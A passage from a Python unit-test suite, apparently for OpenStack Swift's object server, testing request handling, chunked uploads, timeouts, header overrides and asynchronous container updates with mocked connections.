inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': 'INVALID',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '405 ')
def test_call_name_collision(self):
def my_check(*args):
return False
def my_hash_path(*args):
return md5('collide').hexdigest()
with mock.patch("swift.obj.diskfile.hash_path", my_hash_path):
with mock.patch("swift.obj.server.check_object_creation",
my_check):
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({
'REQUEST_METHOD': 'PUT',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/a/c/o',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'CONTENT_TYPE': 'text/html',
'HTTP_X_TIMESTAMP': normalize_timestamp(1.2),
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '201 ')
inbuf = WsgiBytesIO()
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
"""Sends args to outbuf"""
outbuf.writelines(args)
self.object_controller.__call__({
'REQUEST_METHOD': 'PUT',
'SCRIPT_NAME': '',
'PATH_INFO': '/sda1/p/b/d/x',
'SERVER_NAME': '127.0.0.1',
'SERVER_PORT': '8080',
'SERVER_PROTOCOL': 'HTTP/1.0',
'CONTENT_LENGTH': '0',
'CONTENT_TYPE': 'text/html',
'HTTP_X_TIMESTAMP': normalize_timestamp(1.3),
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.input': inbuf,
'wsgi.errors': errbuf,
'wsgi.multithread': False,
'wsgi.multiprocess': False,
'wsgi.run_once': False},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '403 ')
def test_invalid_method_doesnt_exist(self):
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.object_controller.__call__({
'REQUEST_METHOD': 'method_doesnt_exist',
'PATH_INFO': '/sda1/p/a/c/o'},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '405 ')
def test_invalid_method_is_not_public(self):
errbuf = StringIO()
outbuf = StringIO()
def start_response(*args):
outbuf.writelines(args)
self.object_controller.__call__({'REQUEST_METHOD': '__init__',
'PATH_INFO': '/sda1/p/a/c/o'},
start_response)
self.assertEqual(errbuf.getvalue(), '')
self.assertEqual(outbuf.getvalue()[:4], '405 ')
def test_chunked_put(self):
listener = listen_zero()
port = listener.getsockname()[1]
killer = spawn(wsgi.server, listener, self.object_controller,
NullLogger())
sock = connect_tcp(('localhost', port))
fd = sock.makefile()
fd.write('PUT /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
'Content-Type: text/plain\r\n'
'Connection: close\r\nX-Timestamp: %s\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'2\r\noh\r\n4\r\n hai\r\n0\r\n\r\n' % normalize_timestamp(
1.0))
fd.flush()
headers = readuntil2crlfs(fd)
exp = 'HTTP/1.1 201'
self.assertEqual(headers[:len(exp)], exp)
sock = connect_tcp(('localhost', port))
fd = sock.makefile()
fd.write('GET /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
'Connection: close\r\n\r\n')
fd.flush()
headers = readuntil2crlfs(fd)
exp = 'HTTP/1.1 200'
self.assertEqual(headers[:len(exp)], exp)
response = fd.read()
self.assertEqual(response, 'oh hai')
killer.kill()
def test_chunked_content_length_mismatch_zero(self):
listener = listen_zero()
port = listener.getsockname()[1]
killer = spawn(wsgi.server, listener, self.object_controller,
NullLogger())
sock = connect_tcp(('localhost', port))
fd = sock.makefile()
fd.write('PUT /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
'Content-Type: text/plain\r\n'
'Connection: close\r\nX-Timestamp: %s\r\n'
'Content-Length: 0\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'2\r\noh\r\n4\r\n hai\r\n0\r\n\r\n' % normalize_timestamp(
1.0))
fd.flush()
headers = readuntil2crlfs(fd)
exp = 'HTTP/1.1 201'
self.assertEqual(headers[:len(exp)], exp)
sock = connect_tcp(('localhost', port))
fd = sock.makefile()
fd.write('GET /sda1/p/a/c/o HTTP/1.1\r\nHost: localhost\r\n'
'Connection: close\r\n\r\n')
fd.flush()
headers = readuntil2crlfs(fd)
exp = 'HTTP/1.1 200'
self.assertEqual(headers[:len(exp)], exp)
response = fd.read()
self.assertEqual(response, 'oh hai')
killer.kill()
def test_max_object_name_length(self):
timestamp = normalize_timestamp(time())
max_name_len = constraints.MAX_OBJECT_NAME_LENGTH
req = Request.blank(
'/sda1/p/a/c/' + ('1' * max_name_len),
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'DATA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/' + ('2' * (max_name_len + 1)),
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'DATA'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_max_upload_time(self):
class SlowBody(object):
def __init__(self):
self.sent = 0
def read(self, size=-1):
if self.sent < 4:
sleep(0.1)
self.sent += 1
return ' '
return ''
def set_hundred_continue_response_headers(*a, **kw):
pass
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': SlowBody()},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4', 'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.object_controller.max_upload_time = 0.1
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': SlowBody()},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4', 'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 408)
def test_short_body(self):
class ShortBody(object):
def __init__(self):
self.sent = False
def read(self, size=-1):
if not self.sent:
self.sent = True
return ' '
return ''
def set_hundred_continue_response_headers(*a, **kw):
pass
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT', 'wsgi.input': ShortBody()},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4', 'Content-Type': 'text/plain'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 499)
def test_bad_sinces(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4', 'Content-Type': 'text/plain'},
body=' ')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Unmodified-Since': 'Not a valid date'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Modified-Since': 'Not a valid date'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
too_big_date_list = list(datetime.datetime.max.timetuple())
too_big_date_list[0] += 1 # bump up the year
too_big_date = strftime(
"%a, %d %b %Y %H:%M:%S UTC", struct_time(too_big_date_list))
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'If-Unmodified-Since': too_big_date})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
def test_content_encoding(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4', 'Content-Type': 'text/plain',
'Content-Encoding': 'gzip'},
body=' ')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['content-encoding'], 'gzip')
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['content-encoding'], 'gzip')
def test_async_update_http_connect(self):
policy = random.choice(list(POLICIES))
self._stage_tmp_dir(policy)
given_args = []
def fake_http_connect(*args):
given_args.extend(args)
raise Exception('test')
orig_http_connect = object_server.http_connect
try:
object_server.http_connect = fake_http_connect
self.object_controller.async_update(
'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
{'x-timestamp': '1', 'x-out': 'set',
'X-Backend-Storage-Policy-Index': int(policy)}, 'sda1',
policy)
finally:
object_server.http_connect = orig_http_connect
self.assertEqual(
given_args,
['127.0.0.1', '1234', 'sdc1', 1, 'PUT', '/a/c/o', {
'x-timestamp': '1', 'x-out': 'set',
'user-agent': 'object-server %s' % os.getpid(),
'X-Backend-Storage-Policy-Index': int(policy)}])
@patch_policies([StoragePolicy(0, 'zero', True),
StoragePolicy(1, 'one'),
StoragePolicy(37, 'fantastico')])
def test_updating_multiple_delete_at_container_servers(self):
# update router post patch
self.object_controller._diskfile_router = diskfile.DiskFileRouter(
self.conf, self.object_controller.logger)
policy = random.choice(list(POLICIES))
self.object_controller.expiring_objects_account = 'exp'
self.object_controller.expiring_objects_container_divisor = 60
http_connect_args = []
def fake_http_connect(ipaddr, port, device, partition, method, path,
headers=None, query_string=None, ssl=False):
class SuccessfulFakeConn(object):
@property
def status(self):
return 200
def getresponse(self):
return self
def read(self):
return ''
captured_args = {'ipaddr': ipaddr, 'port': port,
'device': device, 'partition': partition,
'method': method, 'path': path, 'ssl': ssl,
'headers': headers, 'query_string': query_string}
http_connect_args.append(
dict((k, v) for k, v in captured_args.items()
if v is not None))
return SuccessfulFakeConn()
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '12345',
'Content-Type': 'application/burrito',
'Content-Length': '0',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Container-Partition': '20',
'X-Container-Host': '1.2.3.4:5',
'X-Container-Device': 'sdb1',
'X-Delete-At': 9999999999,
'X-Delete-At-Container': '9999999960',
'X-Delete-At-Host': "10.1.1.1:6201,10.2.2.2:6202",
'X-Delete-At-Partition': '6237',
'X-Delete-At-Device': 'sdp,sdq'})
with mock.patch.object(
object_server, 'http_connect', fake_http_connect):
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
http_connect_args.sort(key=operator.itemgetter('ipaddr'))
self.assertEqual(len(http_connect_args), 3)
self.assertEqual(
http_connect_args[0],
{'ipaddr': '1.2.3.4',
'port': '5',
'path': '/a/c/o',
'device': 'sdb1',
'partition': '20',
'method': 'PUT',
'ssl': False,
'headers': HeaderKeyDict({
'x-content-type': 'application/burrito',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-size': '0',
'x-timestamp': utils.Timestamp('12345').internal,
'referer': 'PUT http://localhost/sda1/p/a/c/o',
'user-agent': 'object-server %d' % os.getpid(),
'X-Backend-Storage-Policy-Index': int(policy),
'x-trans-id': '-'})})
self.assertEqual(
http_connect_args[1],
{'ipaddr': '10.1.1.1',
'port': '6201',
'path': '/exp/9999999960/9999999999-a/c/o',
'device': 'sdp',
'partition': '6237',
'method': 'PUT',
'ssl': False,
'headers': HeaderKeyDict({
'x-content-type': 'text/plain',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-size': '0',
'x-timestamp': utils.Timestamp('12345').internal,
'referer': 'PUT http://localhost/sda1/p/a/c/o',
'user-agent': 'object-server %d' % os.getpid(),
# system account storage policy is 0
'X-Backend-Storage-Policy-Index': 0,
'x-trans-id': '-'})})
self.assertEqual(
http_connect_args[2],
{'ipaddr': '10.2.2.2',
'port': '6202',
'path': '/exp/9999999960/9999999999-a/c/o',
'device': 'sdq',
'partition': '6237',
'method': 'PUT',
'ssl': False,
'headers': HeaderKeyDict({
'x-content-type': 'text/plain',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-size': '0',
'x-timestamp': utils.Timestamp('12345').internal,
'referer': 'PUT http://localhost/sda1/p/a/c/o',
'user-agent': 'object-server %d' % os.getpid(),
# system account storage policy is 0
'X-Backend-Storage-Policy-Index': 0,
'x-trans-id': '-'})})
@patch_policies([StoragePolicy(0, 'zero', True),
StoragePolicy(1, 'one'),
StoragePolicy(26, 'twice-thirteen')])
def test_updating_multiple_container_servers(self):
# update router post patch
self.object_controller._diskfile_router = diskfile.DiskFileRouter(
self.conf, self.object_controller.logger)
http_connect_args = []
def fake_http_connect(ipaddr, port, device, partition, method, path,
headers=None, query_string=None, ssl=False):
class SuccessfulFakeConn(object):
@property
def status(self):
return 200
def getresponse(self):
return self
def read(self):
return ''
captured_args = {'ipaddr': ipaddr, 'port': port,
'device': device, 'partition': partition,
'method': method, 'path': path, 'ssl': ssl,
'headers': headers, 'query_string': query_string}
http_connect_args.append(
dict((k, v) for k, v in captured_args.items()
if v is not None))
return SuccessfulFakeConn()
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '12345',
'Content-Type': 'application/burrito',
'Content-Length': '0',
'X-Backend-Storage-Policy-Index': '26',
'X-Container-Partition': '20',
'X-Container-Host': '1.2.3.4:5, 6.7.8.9:10',
'X-Container-Device': 'sdb1, sdf1'})
with mock.patch.object(
object_server, 'http_connect', fake_http_connect):
with fake_spawn():
req.get_response(self.object_controller)
http_connect_args.sort(key=operator.itemgetter('ipaddr'))
self.assertEqual(len(http_connect_args), 2)
self.assertEqual(
http_connect_args[0],
{'ipaddr': '1.2.3.4',
'port': '5',
'path': '/a/c/o',
'device': 'sdb1',
'partition': '20',
'method': 'PUT',
'ssl': False,
'headers': HeaderKeyDict({
'x-content-type': 'application/burrito',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-size': '0',
'x-timestamp': utils.Timestamp('12345').internal,
'X-Backend-Storage-Policy-Index': '26',
'referer': 'PUT http://localhost/sda1/p/a/c/o',
'user-agent': 'object-server %d' % os.getpid(),
'x-trans-id': '-'})})
self.assertEqual(
http_connect_args[1],
{'ipaddr': '6.7.8.9',
'port': '10',
'path': '/a/c/o',
'device': 'sdf1',
'partition': '20',
'method': 'PUT',
'ssl': False,
'headers': HeaderKeyDict({
'x-content-type': 'application/burrito',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-size': '0',
'x-timestamp': utils.Timestamp('12345').internal,
'X-Backend-Storage-Policy-Index': '26',
'referer': 'PUT http://localhost/sda1/p/a/c/o',
'user-agent': 'object-server %d' % os.getpid(),
'x-trans-id': '-'})})
def test_object_delete_at_async_update(self):
policy = random.choice(list(POLICIES))
container_updates = []
def capture_updates(ip, port, method, path, headers, *args, **kwargs):
container_updates.append((ip, port, method, path, headers))
put_timestamp = next(self.ts).internal
delete_at_timestamp = utils.normalize_delete_at_timestamp(
next(self.ts).normal)
delete_at_container = (
int(delete_at_timestamp) /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
headers = {
'Content-Type': 'text/plain',
'X-Timestamp': put_timestamp,
'X-Container-Host': '10.0.0.1:6201',
'X-Container-Device': 'sda1',
'X-Container-Partition': 'p',
'X-Delete-At': delete_at_timestamp,
'X-Delete-At-Container': delete_at_container,
'X-Delete-At-Partition': 'p',
'X-Delete-At-Host': '10.0.0.2:6202',
'X-Delete-At-Device': 'sda1',
'X-Backend-Storage-Policy-Index': int(policy)}
if policy.policy_type == EC_POLICY:
headers['X-Object-Sysmeta-Ec-Frag-Index'] = '2'
req = Request.blank(
'/sda1/p/a/c/o', method='PUT', body='', headers=headers)
with mocked_http_conn(
500, 500, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(2, len(container_updates))
delete_at_update, container_update = container_updates
# delete_at_update
ip, port, method, path, headers = delete_at_update
self.assertEqual(ip, '10.0.0.2')
self.assertEqual(port, '6202')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/sda1/p/.expiring_objects/%s/%s-a/c/o' %
(delete_at_container, delete_at_timestamp))
expected = {
'X-Timestamp': put_timestamp,
# system account storage policy is 0
'X-Backend-Storage-Policy-Index': 0,
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
# container_update
ip, port, method, path, headers = container_update
self.assertEqual(ip, '10.0.0.1')
self.assertEqual(port, '6201')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/sda1/p/a/c/o')
expected = {
'X-Timestamp': put_timestamp,
'X-Backend-Storage-Policy-Index': int(policy),
}
for key, value in expected.items():
self.assertEqual(headers[key], str(value))
# check async pendings
async_dir = os.path.join(self.testdir, 'sda1',
diskfile.get_async_dir(policy))
found_files = []
for root, dirs, files in os.walk(async_dir):
for f in files:
async_file = os.path.join(root, f)
found_files.append(async_file)
data = pickle.load(open(async_file))
if data['account'] == 'a':
self.assertEqual(
int(data['headers']
['X-Backend-Storage-Policy-Index']), int(policy))
elif data['account'] == '.expiring_objects':
self.assertEqual(
int(data['headers']
['X-Backend-Storage-Policy-Index']), 0)
else:
self.fail('unexpected async pending data')
self.assertEqual(2, len(found_files))
def test_async_update_saves_on_exception(self):
policy = random.choice(list(POLICIES))
self._stage_tmp_dir(policy)
_prefix = utils.HASH_PATH_PREFIX
utils.HASH_PATH_PREFIX = ''
def fake_http_connect(*args):
raise Exception('test')
orig_http_connect = object_server.http_connect
try:
object_server.http_connect = fake_http_connect
self.object_controller.async_update(
'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
{'x-timestamp': '1', 'x-out': 'set',
'X-Backend-Storage-Policy-Index': int(policy)}, 'sda1',
policy)
finally:
object_server.http_connect = orig_http_connect
utils.HASH_PATH_PREFIX = _prefix
async_dir = diskfile.get_async_dir(policy)
self.assertEqual(
pickle.load(open(os.path.join(
self.testdir, 'sda1', async_dir, 'a83',
'06fbf0b514e5199dfc4e00f42eb5ea83-%s' %
utils.Timestamp(1).internal))),
{'headers': {'x-timestamp': '1', 'x-out': 'set',
'user-agent': 'object-server %s' % os.getpid(),
'X-Backend-Storage-Policy-Index': int(policy)},
'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
def test_async_update_saves_on_non_2xx(self):
policy = random.choice(list(POLICIES))
self._stage_tmp_dir(policy)
_prefix = utils.HASH_PATH_PREFIX
utils.HASH_PATH_PREFIX = ''
def fake_http_connect(status):
class FakeConn(object):
def __init__(self, status):
self.status = status
def getresponse(self):
return self
def read(self):
return ''
return lambda *args: FakeConn(status)
orig_http_connect = object_server.http_connect
try:
for status in (199, 300, 503):
object_server.http_connect = fake_http_connect(status)
self.object_controller.async_update(
'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
{'x-timestamp': '1', 'x-out': str(status),
'X-Backend-Storage-Policy-Index': int(policy)}, 'sda1',
policy)
async_dir = diskfile.get_async_dir(policy)
self.assertEqual(
pickle.load(open(os.path.join(
self.testdir, 'sda1', async_dir, 'a83',
'06fbf0b514e5199dfc4e00f42eb5ea83-%s' %
utils.Timestamp(1).internal))),
{'headers': {'x-timestamp': '1', 'x-out': str(status),
'user-agent':
'object-server %s' % os.getpid(),
'X-Backend-Storage-Policy-Index':
int(policy)},
'account': 'a', 'container': 'c', 'obj': 'o',
'op': 'PUT'})
finally:
object_server.http_connect = orig_http_connect
utils.HASH_PATH_PREFIX = _prefix
def test_async_update_does_not_save_on_2xx(self):
_prefix = utils.HASH_PATH_PREFIX
utils.HASH_PATH_PREFIX = ''
def fake_http_connect(status):
class FakeConn(object):
def __init__(self, status):
self.status = status
def getresponse(self):
return self
def read(self):
return ''
return lambda *args: FakeConn(status)
orig_http_connect = object_server.http_connect
try:
for status in (200, 299):
object_server.http_connect = fake_http_connect(status)
self.object_controller.async_update(
'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
{'x-timestamp': '1', 'x-out': str(status)}, 'sda1', 0)
self.assertFalse(
os.path.exists(os.path.join(
self.testdir, 'sda1', 'async_pending', 'a83',
'06fbf0b514e5199dfc4e00f42eb5ea83-0000000001.00000')))
finally:
object_server.http_connect = orig_http_connect
utils.HASH_PATH_PREFIX = _prefix
def test_async_update_saves_on_timeout(self):
policy = random.choice(list(POLICIES))
self._stage_tmp_dir(policy)
_prefix = utils.HASH_PATH_PREFIX
utils.HASH_PATH_PREFIX = ''
def fake_http_connect():
class FakeConn(object):
def getresponse(self):
return sleep(1)
return lambda *args: FakeConn()
orig_http_connect = object_server.http_connect
try:
for status in (200, 299):
object_server.http_connect = fake_http_connect()
self.object_controller.node_timeout = 0.001
self.object_controller.async_update(
'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
{'x-timestamp': '1', 'x-out': str(status)}, 'sda1',
policy)
async_dir = diskfile.get_async_dir(policy)
self.assertTrue(
os.path.exists(os.path.join(
self.testdir, 'sda1', async_dir, 'a83',
'06fbf0b514e5199dfc4e00f42eb5ea83-%s' %
utils.Timestamp(1).internal)))
finally:
object_server.http_connect = orig_http_connect
utils.HASH_PATH_PREFIX = _prefix
def test_container_update_no_async_update(self):
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.container_update(
'PUT', 'a', 'c', 'o', req, {
'x-size': '0', 'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-content-type': 'text/plain', 'x-timestamp': '1'},
'sda1', policy)
self.assertEqual(given_args, [])
def test_container_update_success(self):
container_updates = []
def capture_updates(ip, port, method, path, headers, *args, **kwargs):
container_updates.append((ip, port, method, path, headers))
req = Request.blank(
'/sda1/0/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '123',
'X-Container-Host': 'chost:cport',
'X-Container-Partition': 'cpartition',
'X-Container-Device': 'cdevice',
'Content-Type': 'text/plain'}, body='')
with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(len(container_updates), 1)
ip, port, method, path, headers = container_updates[0]
self.assertEqual(ip, 'chost')
self.assertEqual(port, 'cport')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/cdevice/cpartition/a/c/o')
self.assertEqual(headers, HeaderKeyDict({
'user-agent': 'object-server %s' % os.getpid(),
'x-size': '0',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-content-type': 'text/plain',
'x-timestamp': utils.Timestamp(1).internal,
'X-Backend-Storage-Policy-Index': '0', # default when not given
'x-trans-id': '123',
'referer': 'PUT http://localhost/sda1/0/a/c/o'}))
def test_PUT_container_update_overrides(self):
def do_test(override_headers):
container_updates = []
def capture_updates(
ip, port, method, path, headers, *args, **kwargs):
container_updates.append((ip, port, method, path, headers))
ts_put = next(self.ts)
headers = {
'X-Timestamp': ts_put.internal,
'X-Trans-Id': '123',
'X-Container-Host': 'chost:cport',
'X-Container-Partition': 'cpartition',
'X-Container-Device': 'cdevice',
'Content-Type': 'text/plain',
}
headers.update(override_headers)
req = Request.blank('/sda1/0/a/c/o', method='PUT',
headers=headers, body='')
with mocked_http_conn(
200, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(len(container_updates), 1)
ip, port, method, path, headers = container_updates[0]
self.assertEqual(ip, 'chost')
self.assertEqual(port, 'cport')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/cdevice/cpartition/a/c/o')
self.assertEqual(headers, HeaderKeyDict({
'user-agent': 'object-server %s' % os.getpid(),
'x-size': '0',
'x-etag': 'override_etag',
'x-content-type': 'override_val',
'x-timestamp': ts_put.internal,
'X-Backend-Storage-Policy-Index': '0', # default
'x-trans-id': '123',
'referer': 'PUT http://localhost/sda1/0/a/c/o',
'x-foo': 'bar'}))
# EC policy override headers
do_test({
'X-Backend-Container-Update-Override-Etag': 'override_etag',
'X-Backend-Container-Update-Override-Content-Type': 'override_val',
'X-Backend-Container-Update-Override-Foo': 'bar',
'X-Backend-Container-Ignored': 'ignored'})
# middleware override headers
do_test({
'X-Object-Sysmeta-Container-Update-Override-Etag': 'override_etag',
'X-Object-Sysmeta-Container-Update-Override-Content-Type':
'override_val',
'X-Object-Sysmeta-Container-Update-Override-Foo': 'bar',
'X-Object-Sysmeta-Ignored': 'ignored'})
# middleware override headers take precedence over EC policy headers
do_test({
'X-Object-Sysmeta-Container-Update-Override-Etag': 'override_etag',
'X-Object-Sysmeta-Container-Update-Override-Content-Type':
'override_val',
'X-Object-Sysmeta-Container-Update-Override-Foo': 'bar',
'X-Backend-Container-Update-Override-Etag': 'ignored',
'X-Backend-Container-Update-Override-Content-Type': 'ignored',
'X-Backend-Container-Update-Override-Foo': 'ignored'})
def test_container_update_async(self):
policy = random.choice(list(POLICIES))
req = Request.blank(
'/sda1/0/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '123',
'X-Container-Host': 'chost:cport',
'X-Container-Partition': 'cpartition',
'X-Container-Device': 'cdevice',
'Content-Type': 'text/plain',
'X-Object-Sysmeta-Ec-Frag-Index': 0,
'X-Backend-Storage-Policy-Index': int(policy)}, body='')
given_args = []
def fake_pickle_async_update(*args):
given_args[:] = args
diskfile_mgr = self.object_controller._diskfile_router[policy]
diskfile_mgr.pickle_async_update = fake_pickle_async_update
with mocked_http_conn(500) as fake_conn, fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(len(given_args), 7)
(objdevice, account, container, obj, data, timestamp,
policy) = given_args
self.assertEqual(objdevice, 'sda1')
self.assertEqual(account, 'a')
self.assertEqual(container, 'c')
self.assertEqual(obj, 'o')
self.assertEqual(timestamp, utils.Timestamp(1).internal)
self.assertEqual(policy, policy)
self.assertEqual(data, {
'headers': HeaderKeyDict({
'X-Size': '0',
'User-Agent': 'object-server %s' % os.getpid(),
'X-Content-Type': 'text/plain',
'X-Timestamp': utils.Timestamp(1).internal,
'X-Trans-Id': '123',
'Referer': 'PUT http://localhost/sda1/0/a/c/o',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Etag': 'd41d8cd98f00b204e9800998ecf8427e'}),
'obj': 'o',
'account': 'a',
'container': 'c',
'op': 'PUT'})
def test_container_update_as_greenthread(self):
greenthreads = []
saved_spawn_calls = []
called_async_update_args = []
def local_fake_spawn(func, *a, **kw):
saved_spawn_calls.append((func, a, kw))
return mock.MagicMock()
def local_fake_async_update(*a, **kw):
# just capture the args to see that we would have called
called_async_update_args.append([a, kw])
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '12345',
'Content-Type': 'application/burrito',
'Content-Length': '0',
'X-Backend-Storage-Policy-Index': 0,
'X-Container-Partition': '20',
'X-Container-Host': '1.2.3.4:5',
'X-Container-Device': 'sdb1'})
with mock.patch.object(object_server, 'spawn',
local_fake_spawn):
with mock.patch.object(self.object_controller,
'async_update',
local_fake_async_update):
resp = req.get_response(self.object_controller)
# check the response is completed and successful
self.assertEqual(resp.status_int, 201)
# check that async_update hasn't been called
self.assertFalse(len(called_async_update_args))
# now do the work in greenthreads
for func, a, kw in saved_spawn_calls:
gt = spawn(func, *a, **kw)
greenthreads.append(gt)
# wait for the greenthreads to finish
for gt in greenthreads:
gt.wait()
# check that the calls to async_update have happened
headers_out = {'X-Size': '0',
'X-Content-Type': 'application/burrito',
'X-Timestamp': '0000012345.00000',
'X-Trans-Id': '-',
'Referer': 'PUT http://localhost/sda1/p/a/c/o',
'X-Backend-Storage-Policy-Index': '0',
'X-Etag': 'd41d8cd98f00b204e9800998ecf8427e'}
expected = [('PUT', 'a', 'c', 'o', '1.2.3.4:5', '20', 'sdb1',
headers_out, 'sda1', POLICIES[0]),
